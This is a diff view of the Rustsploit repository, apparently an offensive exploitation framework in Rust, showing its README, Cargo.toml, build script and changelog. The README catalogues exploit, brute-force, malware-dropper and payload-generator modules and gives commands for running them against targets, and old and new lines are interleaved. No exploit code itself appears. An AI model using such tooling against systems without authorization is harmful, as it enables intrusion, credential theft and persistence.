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Author SHA1 Message Date
S.B 28dd1f66dd Update roundcube_postauth_rce.rs 2025-06-17 01:32:07 +02:00
S.B e06042d828 Merge pull request #18 from s-b-repo/codex/add-roundcube-post-auth-rce-exploit-module
Add Roundcube post-auth RCE exploit
2025-06-17 01:19:33 +02:00
S.B e05c253bcb Add Roundcube post-auth RCE exploit 2025-06-17 01:18:13 +02:00
S.B 48bde25147 Update Cargo.toml 2025-06-17 01:03:55 +02:00
S.B 25c77dcb3b Update ping_sweep.rs 2025-06-17 01:03:03 +02:00
S.B 070e807b3e Merge pull request #16 from s-b-repo/codex/add-multiple-scanner-modules
Add ping sweep and HTTP title scanner modules
2025-06-17 00:29:05 +02:00
S.B a942303323 Add new ping sweep and HTTP title scanners 2025-06-17 00:22:35 +02:00
S.B 6a4aa3a2ad Merge pull request #15 from s-b-repo/codex/improve-modules-and-optimize-code
Refine proxy selection and fix generator path
2025-06-17 00:07:54 +02:00
S.B 0b1c1a8c7a fix generator path and improve proxy selection 2025-06-17 00:06:52 +02:00
41 changed files with 1290 additions and 7293 deletions
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[package]
name = "rustsploit"
version = "0.2.0"
version = "0.1.0"
edition = "2021"
build = "build.rs"
[dependencies]
# For HTTP requests
reqwest = { version = "0.12", features = ["json", "cookies", "socks"] }
reqwest = { version = "0.12.15", features = ["json", "cookies", "socks"] }
#proxy manager
rand = "0.9"
rand = "0.9.0"
# For CLI parsing
clap = { version = "4.5", features = ["derive"] }
clap = { version = "4.5.35", features = ["derive"] }
# Async runtime for networking
tokio = { version = "1.44", features = ["macros", "rt-multi-thread", "process","rt","fs", "io-std"] }
tokio = { version = "1.44.2", features = ["macros", "rt-multi-thread", "process","rt","fs", "io-std"] }
# Easier error handling
anyhow = "1.0"
anyhow = "1.0.97"
#teminal color
colored = "3.0"
rustyline = "15.0"
colored = "3.0.0"
rustyline = "15.0.0"
#ftp brute force module
async_ftp = "6.0"
tokio-socks = "0.5"
rustls = "0.23"
webpki-roots = "0.26"
suppaftp = { version = "6.2", features = ["async", "async-native-tls","native-tls"] }
native-tls = "0.2"
sysinfo = { version = "0.36", features = ["multithread"] }
async_ftp = "6.0.0"
tokio-socks = "0.5.2"
rustls = "0.23.26"
webpki-roots = "0.26.8"
suppaftp = { version = "6.2.0", features = ["async", "async-native-tls","native-tls"] }
native-tls = "0.2.14"
sysinfo = { version = "0.34.2", features = ["multithread"] }
#telnet
threadpool = "1.8"
crossbeam-channel = "0.5"
telnet = "0.2"
threadpool = "1.8.1"
crossbeam-channel = "0.5.15"
telnet = "0.2.3"
walkdir = "2.5"
walkdir = "2.5.0"
#ssh
ssh2 = "0.9"
ssh2 = "0.9.5"
# rstp brute forcing
base64 = "0.22"
base64 = "0.22.1"
# RDP brute forcing module
rdp = "0.12"
rdp = "0.12.8"
# ssdp moudle scanner
regex = "1.11"
ipnet = "2.11"
regex = "1.11.1"
ipnet = "2.11.0"
#camera uniview exploit
quick-xml = "0.37"
quick-xml = "0.37.4"
#ABUS TVIP Dropbear
md5 = "0.7"
ftp = "3.0"
md5 = "0.7.0"
ftp = "3.0.1"
#ssh rce race condition
libc = "0.2"
futures = "0.3"
futures-util = "0.3"
libc = "0.2.172"
futures = "0.3.31"
#spotube exploit
serde_json = "1.0"
tokio-tungstenite = "0.26"
serde_json = "1.0.140"
futures-util = "0.3.31"
tokio-tungstenite = "0.26.2"
#zte rce
# Add these to [dependencies]
aes = "0.8"
cipher = "0.4"
flate2 = "1.0"
aes = "0.8.3"
cipher = "0.4.4"
flate2 = "1.0.30"
# for Roundcube exploit payload encoding
data-encoding = "2.5"
data-encoding = "2.5.0"
#avanti
url = "2.5"
semver = "1.0"
url = "2.5.4"
semver = "1.0.26"
#stalk route full traceroute
pnet_packet = "0.34"
socket2 = { version = "0.5", features = ["all"] }
# HTTP/2 Rapid Reset DoS
# Note: h2 0.3 requires http 0.2. Upgrading to h2 0.4 would require http 1.0+ and code changes
h2 = "0.3"
tokio-rustls = "0.24"
http = "0.2"
bytes = "1.0"
pnet_packet = "0.34" # Or the latest compatible version
socket2 = { version = "0.5", features = ["all"] } # Or the latest compatible version
#pingsweep
which = "8.0"
# API server
axum = "0.7"
tower = "0.5"
tower-http = { version = "0.6", features = ["cors", "trace"] }
chrono = { version = "0.4", features = ["serde"] }
serde = { version = "1.0", features = ["derive"] }
uuid = { version = "1.10", features = ["v4"] }
sha2 = "0.10"
hex = "0.4"
# DNS tooling
trust-dns-client = { version = "0.23", features = ["dnssec"] }
trust-dns-proto = "0.23"
# Pin transitive dependencies to edition-2021-compatible releases
# (newer versions require unstable edition2024 feature)
home = "=0.5.11"
which = "8.0.0"
[build-dependencies]
regex = "1.11" # required for use in build.rs
regex = "1.11.1" # required for use in build.rs
[[bin]]
name = "rustsploit"
path = "src/main.rs"
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# Rustsploit 🛠️
Modular offensive tooling for embedded targets, written in Rust and inspired by RouterSploit/Metasploit. Rustsploit ships an interactive shell, a command-line runner, rich proxy support, and an ever-growing library of exploits, scanners, and credential modules for routers, cameras, appliances, and general network services.
A Rust-based modular exploitation framework inspired by RouterSploit. This tool allows for running modules such as exploits, scanners, and credential checkers against embedded devices like routers.
![Screenshot](https://github.com/s-b-repo/rustsploit/raw/main/preview.png)
- 📚 **Developer Docs:** [Full guide covering module lifecycle, proxy logic, shell flow, and dispatcher](https://github.com/s-b-repo/rustsploit/blob/main/docs/readme.md)
- 💬 **Interactive Shell:** Ergonomic command palette with shortcuts (e.g., `f1 ssh`, `u exploits/heartbleed`, `go`)
- 🌐 **Proxy Smartness:** Supports HTTP(S), SOCKS4/4a/5 (with hostname resolution), validation, and automatic rotation
- 🧱 **IPv4/IPv6 Ready:** Credential modules and sockets normalize targets so both address families work out-of-the-box
📚 **Developer Documentation**:
→ [Full Dev Guide (modules, proxy logic, shell flow, dispatch system)](https://github.com/s-b-repo/rustsploit/blob/main/docs/readme.md)
---
### Goals & To Do lists
## Table of Contents
Convert exploits and add modules
1. [Highlights](#highlights)
2. [Module Catalog](#module-catalog)
3. [Quick Start](#quick-start)
4. [Docker Deployment](#docker-deployment)
5. [Interactive Shell Walkthrough](#interactive-shell-walkthrough)
6. [CLI Usage](#cli-usage)
7. [API Server Mode](#api-server-mode)
8. [Proxy Workflow](#proxy-workflow)
9. [How Modules Are Discovered](#how-modules-are-discovered)
10. [Contributing](#contributing)
11. [Credits](#credits)
---
## Highlights
-**Auto-discovered modules:** `build.rs` indexes `src/modules/**` so new code drops in without manual registration
-**Interactive shell with color and shortcuts:** Quick command palette, target/module state tracking, alias commands (`help/?`, `modules/m`, `run/go`, etc.)
-**Ergonomic proxy system:** Load lists, validate availability, choose concurrency/timeouts, and rotate automatically on failure
-**Comprehensive credential tooling:** FTP(S), SSH, Telnet, POP3(S), SMTP, RDP, RTSP brute force modules with IPv6 and TLS support where applicable
-**Exploit coverage:** Apache Tomcat, Abus security cameras, Ivanti Connect Secure, TP-Link, Zabbix, Avtech cameras, Spotube, OpenSSH race condition, and more
-**Scanners & utilities:** Port scanner, ping sweep, SSDP discovery, HTTP title grabber, StalkRoute traceroute (root), sample modules for extension
-**Payload generation:** Batch malware dropper (`narutto_dropper`), BAT payload generator, custom credential checkers
-**Readable output:** Colored prompts, structured status messages, optional verbose logs and result persistence
-**REST API Server:** Launch a secure API server with authentication, rate limiting, IP tracking, and dynamic key rotation
---
## Module Catalog
Rustsploit ships categorized modules under `src/modules/`, automatically exposed to the shell/CLI. A non-exhaustive snapshot:
| Category | Highlights |
|----------|------------|
| `creds/generic` | FTP anonymous & FTPS brute force, SSH brute force, Telnet brute force, POP3(S) brute force, SMTP brute force, RTSP brute force (path + header bruting), RDP auth-only brute |
| `exploits/*` | Apache Tomcat (CVE-2025-24813 RCE, CatKiller CVE-2025-31650), TP-Link VN020 / WR740N DoS, Abus camera CVE-2023-26609 variants, Ivanti Connect Secure stack buffer overflow, Zabbix 7.0.0 SQLi, Avtech CVE-2024-7029, Spotube zero-day, OpenSSH 9.8p1 race condition, Uniview password disclosure, ACTi camera RCE |
| `scanners` | Port scanner, ping sweep, SSDP M-SEARCH enumerator, HTTP title fetcher, DNS recursion/amplification tester, StalkRoute traceroute (firewall evasion) |
| `payloadgens` | `narutto_dropper`, BAT payload generator |
| `lists` | RTSP wordlists and helper files |
Run `modules` or `find <keyword>` in the shell for the authoritative list.
---
## Quick Start
### Requirements
```bash
sudo apt update
sudo apt install freerdp2-x11 # Required for the RDP brute force module
# completed
```
Ensure Rust and Cargo are installed (https://www.rust-lang.org/tools/install).
added stalkroute a traceroute with firewall evasion requires root
added malware dropper narruto dropper
added refactored and fixed and improve alot of modules
added added new version of payloadgen
added smtp bruteforcer
added pop3 bruteforcer
added zte zte_zxv10_h201l_rce_authenticationbypass
added ivanti ivanti_connect_secure_stack_based_buffer_overflow
added apache_tomcat cve_2025_24813_apache_tomcat_rce
added apache_tomcat catkiller_cve_2025_31650
added palto_alto CVE-2025-0108. auth bypass
added acm_5611_rce
added zabbix_7_0_0_sql_injection
added cve_2024_7029_avtech_camera
added pachev_ftp_path_traversal_1_0
added ipv6 support for rstp rdp and ssh cant find any ipv6 address i cant test on so untested
added ftps support
added ipv6 support to ftp anon and brute
added rdp ipv6 support unable to find rpd ipv6 device to test on with shodan
added exploit openssh server race condition 9.8.p1 |Server Destruction fork |
bomb Persistence create SSH user | Remote Root Shell
### Clone + Build
added spotube exploit zero day exploit as of 24 april reported to spotube
added exploit tplink_wr740n Buffer Overflow 'DOS'
added exploit tp_link_vn020 Denial Of Service (DOS)
added exploit abussecurity_camera_cve 2023 26609 variant2 RCE and SSH Root Access adds persistant account
added exploit abussecurity_camera_cve 2023 26609 variant1 LFI, RCE and SSH Root Access
added exploit uniview_nvr_pwd_disclosure password disclore
updated docs again and readme
rework command system to automaticly detect new modules
added uniview_nvr_pwd_disclosure
added ssdp_msearch
added hearbleed info leak from server saved to a bin file
added port scanner
added ping_sweep network scanner
added http_title_scanner
added find command
updated docs
created docs
added wordlist for camera paths
added acti camera module
created bat payload generator for malware
added proxy support https/http socks4/socks5
telnet brute forcing module
ssh brute forcing module
ftp anonymous login module
ftp brute forcing module
added rtsp_bruteforce module
dynamic modules listing and colored listing
```
```bash
---
```
## 🚀 Building & Running
## 📦🛠️ requirements
`
sudo apt update
sudo apt install freerdp2-x11
for rdp bruteforce modudle
```
```
### 📦 Clone the Repository
```
git clone https://github.com/s-b-repo/rustsploit.git
cd rustsploit
```
### 🛠️ Build the Project
```
cargo build
```
### Run (Interactive Shell)
```bash
To build and run:
```
cargo run
```
### Install (optional)
```bash
cargo install --path .
To install:
```
cargo install
```
---
## Docker Deployment
### 🖥️ Run in Interactive Shell Mode
Rustsploit ships with a standalone provisioning script that builds and launches the API inside Docker (mirroring the multi-stage workflow used in vxcontrol/pentagi).
Launch the interactive RSF shell:
### Requirements
- Docker Engine 24+ (or Docker Desktop)
- Docker Compose plugin (`docker compose`) or legacy `docker-compose`
- Python 3.8+
### Interactive Setup
```bash
python3 scripts/setup_docker.py
```
cargo run
```
The helper will:
1. Confirm you are in the repository root (`Cargo.toml` present).
2. Ask how the API should bind (`127.0.0.1`, `0.0.0.0`, detected LAN IP, or custom host:port).
3. Let you enter or auto-generate an API key (printable ASCII, 128 chars max).
4. Toggle hardening mode and tune the IP limit if desired.
5. Generate:
- `docker/Dockerfile.api` (build + serve stages)
- `docker/entrypoint.sh` (passes CLI flags / hardening state)
- `.env.rustsploit-docker` (API key, bind address, hardening settings)
- `docker-compose.rustsploit.yml`
6. Optionally run `docker compose up -d --build` with BuildKit enabled.
Existing files are never overwritten without confirmation (use `--force` for scripted deployments).
### Non-Interactive / CI Usage
All prompts have CLI equivalents:
```bash
python3 scripts/setup_docker.py \
--bind 0.0.0.0:8443 \
--generate-key \
--enable-hardening \
--ip-limit 5 \
--skip-up \
--force \
--non-interactive
```
This produces the Docker assets but skips the compose launch. To start the stack later:
```bash
docker compose -f docker-compose.rustsploit.yml up -d --build
```
Environment variables are written with 0600 permissions so secrets stay private. Re-run the script any time you want to regenerate artefacts or rotate the API key.
---
## Interactive Shell Walkthrough
The shell tracks current module, target, and proxy state. All commands are case-insensitive and support aliases:
Once inside the shell:
```text
RustSploit Command Palette
Command Shortcuts Description
--------------- ------------------------- ------------------------------
help help | h | ? Show this screen
modules modules | ls | m List discovered modules
find find <kw> | f1 <kw> Search modules by keyword
use use <path> | u <path> Select module (ex: u exploits/heartbleed)
set target set target <value> Set current target (IPv4/IPv6/hostname)
run run | go Execute current module (honors proxy mode)
proxy_load proxy_load [file] | pl Load proxies from file (HTTP/HTTPS/SOCKS)
proxy_on/off proxy_on | pon / ... Toggle proxy usage
proxy_test proxy_test | ptest Validate proxies (URL, timeout, concurrency)
show_proxies show_proxies | proxies View proxy status
exit exit | quit | q Leave shell
rsf> help
rsf> modules
rsf> show_proxies
rsf> proxy_on / proxy_off
rsf> proxy_load proxies.txt
rsf> find
rsf> use exploits/heartbleed
rsf> set target 192.168.1.1
rsf> run
```
Example session:
```text
rsf> f1 ssh
rsf> u creds/generic/ssh_bruteforce
rsf> set target 10.10.10.10
rsf> pl data/proxies.txt # prompts if omitted
rsf> pon
rsf> proxy_test # optional validation / filtering
rsf> go
```
If proxy mode is enabled, Rustsploit rotates through validated proxies, falls back to direct mode only after exhaustion, and politely reports successes or errors.
🌀 Supports retrying proxies until one works (if proxy_on is enabled).
---
## CLI Usage
### 🔧 Run in CLI Mode
Modules can be executed without the shell using the `--command`, `--module`, and `--target` flags:
```bash
# Exploit
#### ▶ Exploit
```
cargo run -- --command exploit --module heartbleed --target 192.168.1.1
```
# Scanner
#### 🧪 Scanner
```
cargo run -- --command scanner --module port_scanner --target 192.168.1.1
# Credentials
cargo run -- --command creds --module ssh_bruteforce --target 192.168.1.1
```
Any module exposed to the shell can be called here. Use the `modules` shell command or browse `src/modules/**` for canonical names.
---
## API Server Mode
Rustsploit includes a REST API server mode that allows remote control of the tool via HTTP endpoints. The API includes authentication, rate limiting, IP tracking, and security hardening features.
### Starting the API Server
```bash
# Basic API server (defaults to 0.0.0.0:8080)
cargo run -- --api --api-key your-secret-key-here
# With hardening enabled (auto-rotate API key on suspicious activity)
cargo run -- --api --api-key your-secret-key-here --harden
# Custom interface and IP limit
cargo run -- --api --api-key your-secret-key-here --harden --interface 127.0.0.1 --ip-limit 5
# Custom port
cargo run -- --api --api-key your-secret-key-here --interface 0.0.0.0:9000
#### 🔐 Credentials
```
### API Flags
| Flag | Description | Required |
|------|-------------|----------|
| `--api` | Enable API server mode | Yes |
| `--api-key <key>` | API key for authentication | Yes (when using `--api`) |
| `--harden` | Enable hardening mode (auto-rotate key on suspicious activity) | No |
| `--interface <addr>` | Network interface/IP to bind to (default: `0.0.0.0`) | No |
| `--ip-limit <num>` | Maximum unique IPs before auto-rotation (default: 10, requires `--harden`) | No |
### API Endpoints
All endpoints except `/health` require authentication via the `Authorization` header:
```bash
# Bearer token format
Authorization: Bearer your-api-key-here
# Or ApiKey format
Authorization: ApiKey your-api-key-here
```
#### Public Endpoints
- **`GET /health`** - Health check (no authentication required)
```bash
curl http://localhost:8080/health
```
#### Protected Endpoints
- **`GET /api/modules`** - List all available modules
```bash
curl -H "Authorization: Bearer your-api-key" http://localhost:8080/api/modules
```
- **`POST /api/run`** - Execute a module on a target
```bash
curl -X POST -H "Authorization: Bearer your-api-key" \
-H "Content-Type: application/json" \
-d '{"module": "scanners/port_scanner", "target": "192.168.1.1"}' \
http://localhost:8080/api/run
```
- **`GET /api/status`** - Get API server status and statistics
```bash
curl -H "Authorization: Bearer your-api-key" http://localhost:8080/api/status
```
- **`POST /api/rotate-key`** - Manually rotate the API key
```bash
curl -X POST -H "Authorization: Bearer your-api-key" \
http://localhost:8080/api/rotate-key
```
- **`GET /api/ips`** - Get all tracked IP addresses with details
```bash
curl -H "Authorization: Bearer your-api-key" http://localhost:8080/api/ips
```
- **`GET /api/auth-failures`** - Get authentication failure statistics
```bash
curl -H "Authorization: Bearer your-api-key" http://localhost:8080/api/auth-failures
```
### Security Features
#### Rate Limiting
- IPs are automatically blocked for **30 seconds** after **3 failed authentication attempts**
- Blocked IPs receive HTTP `429 Too Many Requests` responses
- Failed attempts are logged to both terminal and log file
- Counter resets automatically after the block period expires
- Successful authentication resets the failure counter for that IP
#### Hardening Mode
When `--harden` is enabled:
- Tracks unique IP addresses accessing the API
- Automatically rotates the API key when the number of unique IPs exceeds the limit (default: 10)
- Logs all rotation events to terminal and `rustsploit_api.log`
- Clears IP tracking after key rotation
#### Logging
All API activity is logged to:
- **Terminal:** Real-time console output with colored status messages
- **Log File:** `rustsploit_api.log` in the current working directory
Log entries include:
- API requests and responses
- Authentication failures and rate limiting events
- IP tracking and hardening actions
- Key rotation events
- Module execution results
### Example API Workflow
```bash
# 1. Start the API server
cargo run -- --api --api-key my-secret-key --harden --ip-limit 5
# 2. Check health
curl http://localhost:8080/health
# 3. List available modules
curl -H "Authorization: Bearer my-secret-key" http://localhost:8080/api/modules
# 4. Run a port scan
curl -X POST -H "Authorization: Bearer my-secret-key" \
-H "Content-Type: application/json" \
-d '{"module": "scanners/port_scanner", "target": "192.168.1.1"}' \
http://localhost:8080/api/run
# 5. Check status
curl -H "Authorization: Bearer my-secret-key" http://localhost:8080/api/status
# 6. View tracked IPs
curl -H "Authorization: Bearer my-secret-key" http://localhost:8080/api/ips
cargo run -- --command creds --module ssh_brute --target 192.168.1.1
```
---
## Proxy Workflow
## 🌐 Proxy Retry Logic (Shell Mode)
Rustsploit treats proxy lists as first-class citizens:
- Accepts HTTP, HTTPS, SOCKS4, SOCKS4a, SOCKS5, and SOCKS5h entries
- Loads from user-supplied files, skipping invalid lines with reasons
- Optional connectivity test prompts allow tuning:
- Test URL (default `https://example.com`)
- Timeout (seconds)
- Max concurrent checks
- Keeps only working proxies when validation is requested
- Rotates at run time; if all proxies fail, reverts to direct host attempts automatically
Environment variables (`ALL_PROXY`, `HTTP_PROXY`, `HTTPS_PROXY`) are managed transparently per attempt.
- If proxies are loaded and `proxy_on` is active:
- Random proxy is used from list
- On failure, tries another until successful
- If all fail, it runs once **without proxy**
---
## How Modules Are Discovered
## 📂 Module System
Rustsploit scans `src/modules/` recursively during build. Each module should expose:
Modules are automatically detected using `build.rs` and registered as:
- Short: `port_scanner`
- Full: `scanners/port_scanner`
```rust
pub async fn run(target: &str) -> anyhow::Result<()>;
Each module must define:
```
pub async fn run(target: &str) -> Result<()>
```
Optional interactive entry points (`run_interactive`) can coexist. Module paths are referenced relative to `src/modules/`, for example:
- File: `src/modules/exploits/sample_exploit.rs`
- Shell path: `exploits/sample_exploit`
See the [Developer Guide](https://github.com/s-b-repo/rustsploit/blob/main/docs/readme.md) for scaffolding templates, async guidance, and tips on logging/persistence.
Optional:
```
pub async fn run_interactive(target: &str) -> Result<()>
```
---
## Contributing
## 🧼 Shell State
Contributions are welcome! High-level suggestions:
The shell keeps:
- Current module
- Current target
- Proxy list + state
1. Fork + branch from `main`
2. Add your module under the appropriate category
3. Keep outputs concise, leverage `.yellow()/.green()` for status, and wrap heavy loops in async tasks when appropriate
4. Document usage patterns in module comments
5. Run `cargo fmt` and `cargo check` before opening a PR
Bug reports, feature requests, and module ideas are appreciated. Feel free to log issues or reach out with PoCs.
No session state is saved — everything resets on restart.
---
## Credits
## 💡 Want to Add a Module?
- **Project Lead:** s-b-repo
- **Language:** 100% Rust
- **Wordlists:** Seclists + custom additions (`lists/` directory)
- **Inspired by:** RouterSploit, Metasploit Framework, pwntools
See the full [Developer Guide](https://github.com/s-b-repo/rustsploit/blob/main/docs/readme.md)
Includes:
- ✅ How to write modules
- 🧠 Auto-dispatch system explained
- 📦 Module placement
- 🌐 Proxy logic details
- 🔍 Scanner vs Exploit vs Credential paths
> ⚠️ Rustsploit is intended for authorized security testing and research purposes only. Obtain explicit permission before targeting any system you do not own.
---
## 👥 Contributors
- **Main Developer**: me.
- **Language**: 100% Rust.
- **Inspired by**: RouterSploit, Metasploit, pwntools
## 👥 Credits
- **wordlists*: seclists & me
---
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use std::collections::HashSet;
use std::env;
use std::fs::{self, File};
use std::io::{Read, Write};
use std::path::Path;
use regex::Regex;
/// Build script that generates module dispatchers for exploits, scanners, and creds.
///
/// This script:
/// - Scans `src/modules/{category}/` directories recursively
/// - Finds all `.rs` files (excluding `mod.rs`) that export `pub async fn run(target: &str)`
/// - Generates dispatch functions that support both short names and full paths
/// - Creates deterministic, sorted output for better maintainability
fn main() {
// Tell Cargo to rerun this build script if module directories change
println!("cargo:rerun-if-changed=src/modules/exploits");
println!("cargo:rerun-if-changed=src/modules/creds");
println!("cargo:rerun-if-changed=src/modules/scanners");
// Generate dispatchers for each module category
let categories = vec![
("src/modules/exploits", "exploit_dispatch.rs", "crate::modules::exploits", "Exploit"),
("src/modules/creds", "creds_dispatch.rs", "crate::modules::creds", "Cred"),
("src/modules/scanners", "scanner_dispatch.rs", "crate::modules::scanners", "Scanner"),
];
for (root, out_file, mod_prefix, category_name) in categories {
if let Err(e) = generate_dispatch(root, out_file, mod_prefix, category_name) {
eprintln!("❌ Error generating {} dispatcher: {}", category_name, e);
std::process::exit(1);
}
}
generate_dispatch(
"src/modules/exploits",
"exploit_dispatch.rs",
"crate::modules::exploits"
);
generate_dispatch(
"src/modules/creds",
"creds_dispatch.rs",
"crate::modules::creds"
);
generate_dispatch(
"src/modules/scanners",
"scanner_dispatch.rs",
"crate::modules::scanners"
);
}
/// Generates a dispatch function for a module category.
///
/// # Arguments
/// * `root` - Root directory to scan (e.g., "src/modules/exploits")
/// * `out_file` - Output filename (e.g., "exploit_dispatch.rs")
/// * `mod_prefix` - Module path prefix (e.g., "crate::modules::exploits")
/// * `category_name` - Category name for error messages (e.g., "Exploit")
fn generate_dispatch(
root: &str,
out_file: &str,
mod_prefix: &str,
category_name: &str,
) -> Result<(), Box<dyn std::error::Error>> {
let out_dir = env::var("OUT_DIR")
.map_err(|_| "OUT_DIR environment variable not set")?;
fn generate_dispatch(root: &str, out_file: &str, mod_prefix: &str) {
let out_dir = env::var("OUT_DIR").unwrap();
let dest_path = Path::new(&out_dir).join(out_file);
let mut file = File::create(&dest_path).unwrap();
let root_path = Path::new(root);
if !root_path.exists() {
return Err(format!("Module directory '{}' does not exist", root).into());
}
// Collect all module mappings (using HashSet to avoid duplicates)
let mut mappings = HashSet::new();
visit_dirs(root_path, "".to_string(), &mut mappings)?;
if mappings.is_empty() {
eprintln!("⚠️ Warning: No modules found in {}", root);
}
// Sort mappings for deterministic output
let mut sorted_mappings: Vec<_> = mappings.iter().collect();
sorted_mappings.sort_by_key(|(key, _)| key);
// Generate the dispatch function
let mut file = File::create(&dest_path)
.map_err(|e| format!("Failed to create {}: {}", dest_path.display(), e))?;
writeln!(
file,
"// Auto-generated by build.rs - DO NOT EDIT MANUALLY\n"
)?;
writeln!(
file,
"/// Dispatches to the appropriate {} module based on module name.\n\
/// Supports both short names (e.g., 'port_scanner') and full paths (e.g., 'scanners/port_scanner').",
category_name.to_lowercase()
)?;
let mut mappings = Vec::new();
visit_dirs(root_path, "".to_string(), &mut mappings).unwrap();
writeln!(
file,
"pub async fn dispatch(module_name: &str, target: &str) -> anyhow::Result<()> {{\n match module_name {{"
)?;
).unwrap();
// Generate match arms for each module (supporting both short and full names)
for (key, mod_path) in &sorted_mappings {
let short_key = key.rsplit('/').next().unwrap_or(key);
let mod_code_path = mod_path.replace("/", "::");
// Support both short name and full path
if short_key == *key {
// No subdirectory, only short name
writeln!(
file,
r#" "{k}" => {{ {p}::{m}::run(target).await? }},"#,
k = key,
m = mod_code_path,
p = mod_prefix
)?;
} else {
// Has subdirectory, support both short and full
writeln!(
file,
r#" "{short}" | "{full}" => {{ {p}::{m}::run(target).await? }},"#,
short = short_key,
full = key,
m = mod_code_path,
p = mod_prefix
)?;
}
for (key, mod_path) in &mappings {
writeln!(
file,
r#" "{k}" => {{ {p}::{m}::run(target).await? }},"#,
k = key,
m = mod_path.replace("/", "::"),
p = mod_prefix
).unwrap();
}
writeln!(
file,
r#" _ => anyhow::bail!("{} module '{{}}' not found.", module_name),"#,
category_name
)?;
r#" _ => anyhow::bail!("Module '{{}}' not found.", module_name),"#
).unwrap();
writeln!(file, " }}\n Ok(())\n}}")?;
println!("✅ Generated {} with {} modules", out_file, sorted_mappings.len());
Ok(())
writeln!(file, " }}\n Ok(())\n}}").unwrap();
}
/// Recursively visits directories to find all module files.
///
/// # Arguments
/// * `dir` - Directory to scan
/// * `prefix` - Current path prefix (e.g., "generic" or "camera/acti")
/// * `mappings` - Set to store (full_path, module_path) tuples
fn visit_dirs(
dir: &Path,
prefix: String,
mappings: &mut HashSet<(String, String)>,
) -> Result<(), Box<dyn std::error::Error>> {
// Compile regex once for better performance
// Matches: pub async fn run(target: &str) or pub async fn run(_target: &str)
let sig_re = Regex::new(r"pub\s+async\s+fn\s+run\s*\(\s*[^)]*:\s*&str\s*\)")
.map_err(|e| format!("Failed to compile regex: {}", e))?;
fn visit_dirs(dir: &Path, prefix: String, mappings: &mut Vec<(String, String)>) -> std::io::Result<()> {
let sig_re = Regex::new(r"pub\s+async\s+fn\s+run\s*\(\s*[_a-zA-Z]+\s*:\s*&str\s*\)").unwrap();
if !dir.is_dir() {
return Ok(());
}
if dir.is_dir() {
for entry in fs::read_dir(dir)? {
let entry = entry?;
let path = entry.path();
let mut entries: Vec<_> = fs::read_dir(dir)?
.collect::<Result<Vec<_>, _>>()?;
// Sort entries for deterministic processing
entries.sort_by_key(|e| e.file_name());
if path.is_dir() {
let sub_prefix = format!("{}/{}", prefix, entry.file_name().to_string_lossy());
visit_dirs(&path, sub_prefix, mappings)?;
} else if path.extension().map_or(false, |e| e == "rs") {
let file_name = path.file_stem().unwrap().to_string_lossy().to_string();
if file_name == "mod" {
continue;
}
for entry in entries {
let path = entry.path();
let file_name = entry.file_name();
let mod_path = format!("{}/{}", prefix, file_name)
.trim_start_matches('/')
.to_string();
let key = mod_path.clone();
if path.is_dir() {
// Recursively visit subdirectories
let sub_prefix = if prefix.is_empty() {
file_name.to_string_lossy().to_string()
} else {
format!("{}/{}", prefix, file_name.to_string_lossy())
};
visit_dirs(&path, sub_prefix, mappings)?;
} else if path.extension().map_or(false, |e| e == "rs") {
// Process Rust files
let file_stem = path.file_stem()
.and_then(|s| s.to_str())
.ok_or_else(|| format!("Invalid file name: {}", path.display()))?;
let mut source = String::new();
fs::File::open(&path)?.read_to_string(&mut source)?;
// Skip mod.rs files
if file_stem == "mod" {
continue;
}
// Build module path
let mod_path = if prefix.is_empty() {
file_stem.to_string()
} else {
format!("{}/{}", prefix, file_stem)
};
// Full key includes the category prefix (will be added in generate_dispatch)
let key = mod_path.clone();
// Read and check for the run function signature
let mut source = String::new();
File::open(&path)?.read_to_string(&mut source)?;
if sig_re.is_match(&source) {
mappings.insert((key.clone(), mod_path.clone()));
let display_path = if prefix.is_empty() {
file_stem.to_string()
if sig_re.is_match(&source) {
mappings.push((key.clone(), mod_path));
println!("✅ Registered module: {}/{}", prefix, file_name);
} else {
format!("{}/{}", prefix, file_stem)
};
println!(" ✅ Registered module: {}", display_path);
} else {
// Only warn in verbose mode to reduce noise
if env::var("RUSTSPLOIT_VERBOSE_BUILD").is_ok() {
println!(" ⚠️ Skipping '{}': no matching 'pub async fn run(target: &str)'", path.display());
println!("⚠️ Skipping '{}': no matching 'pub async fn run(...)'", path.display());
}
}
}
}
Ok(())
}
-457
View File
@@ -1,457 +0,0 @@
Hardened rtsp_bruteforce_advanced by validating path, username, and password wordlists before spinning up tasks, and by falling back to a safe root path when a path list is empty to avoid runtime panics.
Added identical early-exit checks and trimming for the SSH brute-force runner so it fails fast when wordlists are empty instead of silently doing nothing.
Brought the FTP brute-force helper in line with the others by trimming entries, rejecting empty wordlists, and ensuring helper utilities only return meaningful credentials.
Proxy Improvements
Refined proxy loading to validate schemes/hosts/ports, capture parse errors, and expose optional connectivity testing via utils::load_proxies_from_file and utils::test_proxies, keeping only working entries when requested.
Enhanced shell commands: proxy_load now prompts for a path when omitted, reports skipped entries, offers a recommended “test proxies” prompt, and added a dedicated proxy_test command plus reusable prompt helpers.
Implemented interactive proxy-test workflow that gathers URL/timeouts/concurrency, filters failing proxies, and auto-disables proxy mode when none survive.
Shell UX Refresh
Reworked command parsing to support ergonomic aliases (help/h/?, modules/ls/m, find/f1, proxy_load/pl, etc.) and keep everything case-insensitive and whitespace tolerant.
Added a richer, colorized help palette that lists shortcuts and usage tips so “f1 ssh” style workflows are obvious.
Introduced helpers (split_command, resolve_command) to drive the new UX without changing existing behavior, plus guarded prompt utilities already in place.
README Refresh
Rebuilt the README into a professional GitHub-ready document with a TOC, feature highlights, module catalog summary, quick start commands, shell walkthrough (including the new shortcuts), CLI usage, proxy workflow, module discovery flow, and contributing/credits notes.
README Suite Updated
README.md already reflects the full feature set; no further changes needed.
docs/readme.md rewritten into a comprehensive developer guide covering architecture, module discovery, shell internals, proxy system, authoring practices, and roadmap items.
lists/readme.md expanded to document shipped wordlists, usage guidelines, and contribution notes so operators know how data files tie into modules.
Pingsweep.rs
improved and reworked
Added an API launch mode to RustSploit with the requested features.
Features implemented
API launch mode: --api flag to start the API server
API key authentication: --api-key flag (required when using --api)
Dynamic API key rotation: manual via /api/rotate-key endpoint and automatic when hardening triggers
Hardening mode: --harden flag enables IP-based protection
Auto-rotation: when unique IPs exceed the limit (default: 10), the API key auto-rotates
Notifications: alerts in terminal and log file (rustsploit_api.log in the same directory)
Interface selection: --interface flag (defaults to 0.0.0.0), supports IP/interface or full address with port
API endpoints
GET /health - Health check (no auth required)
GET /api/modules - List all available modules
POST /api/run - Run a module on a target
GET /api/status - Get API server status
POST /api/rotate-key - Manually rotate the API key
Usage examples
